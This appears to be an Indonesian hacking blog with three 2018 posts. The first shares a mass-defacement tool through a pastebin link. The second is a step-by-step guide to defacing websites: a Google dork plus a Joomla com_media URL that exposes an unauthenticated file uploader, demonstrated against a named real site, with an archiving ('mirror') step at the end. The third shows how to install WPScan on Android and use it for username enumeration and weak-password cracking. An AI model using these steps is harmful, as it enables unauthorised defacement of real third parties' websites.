Kamis, 29 November 2018

Tools Rusuh yang Mungkin Kalian Suka




Oit w is back >:'V

Sesuai tema kyta di pagi , siang ,sore ,malam ini :'V
"Tools Rusuh yg Mungkin Kalian Suka" :'v (
(Tools Mass Deface

Nah ini tools uda lumayan lama si , tapi baru w up sekarang :'v

Tampilan   

              







Ada beberapa tools mass deface yg ada di berkas , tapi entah kenapa itu yang pengn w share :'v


Tampilan done :'V



Cara gunainya kek bisanya
Buat yg blum tau gini
Kalau mau mass all dir sampe di patch public_html
Klo cuma one dir ya udah ada di sna ,
Intinya kalau mau mass all dir tinggl kurang n site setelah public_html , hanya sampe public_html

Di sana udah auto anu :'v
Jadi nga usah di tulis
Tinggal up copas sc -> index.html/index php done

Minat ?
  Scriptnya->>  https://pastebin.com/raw/kwqmcgDq

Udah ya :'v

Daaa :'v

See u :'v

































Rabu, 14 November 2018

Cara deface menggunakan Exploit com_media


Yo wassap :'>

Ketemu lagi sama saia.
Saia selaku anak tamvan akan membagikan cara deface menggunakan exploit com_media d :'>
Langsung ae gan :'v
Sebelumnya elu siapkan file dlm bentuk .txt

Goo

Dork   : inurl:com_media site:com 
Exploi:/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=


Seperti biasa dorking ke gugel 

Nah terus pilih salah satu :'v
Satu aja ea meq>:'V

Setelah dapet tambah exploitnya :'>

Contoh : https://avd-weiden.bayern/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Nah gitu jembud :'v
Terus klean akan menemukan uploader 
Tinggal up file kyta 
*Ext : txt,png,jpg

Tinggal buka gini
https://avd-weiden.bayern/images/syn.txt
syn.txt itu file w ya meq >:'v
Jadi
Site.com/images/filemu.txt

Done selamat anda menjadi heker :'v


 tinggal mirror 


Sekian dolo :'>

Selasa, 06 November 2018

How to install WPScan in Android with Termux


Yooo wasssap!
Siang,sore,malam,pagi gan :'V
Kali ini w ada cara bagaimana install wp scan di android with termos/Termux :'V


WPScan adalah scanner yang memeriksa keamanan wordpress

Fitur² ato kegunaannya adalah :
1. Pencari kerentanan pada CMS WordPress.
2. Mengintip versi WordPress sebuah website.
3. Multi-threaded, weak password cracking.
4. Username enumeration (from the author).
*Dan lain-lain :'v.
Langsung ae :'V.

-command
$ apt update && apt upgrade
$ apt install git
$ apt install ruby
$ git clone https://github.com/wpscanteam/wpscan/
$ cd wpscan
$ chmod 777 wpscan.rb
$ gem install bundle
$ bundle install -j5
$ ruby wpscan.rb

cara gunainnya:

$ ruby wpscan.rb -u (url target)
$ ruby wpscan.rb -u (url target) –enumerate p (mencari plugins yang terinstall di site target)
$ ruby wpscan.rb -u (url target) –enumerate u (mencari username yang terinstall di site target)
Done_^
Klo kurang jelas ke sini_^
Skian dolo_^
See you[-!-]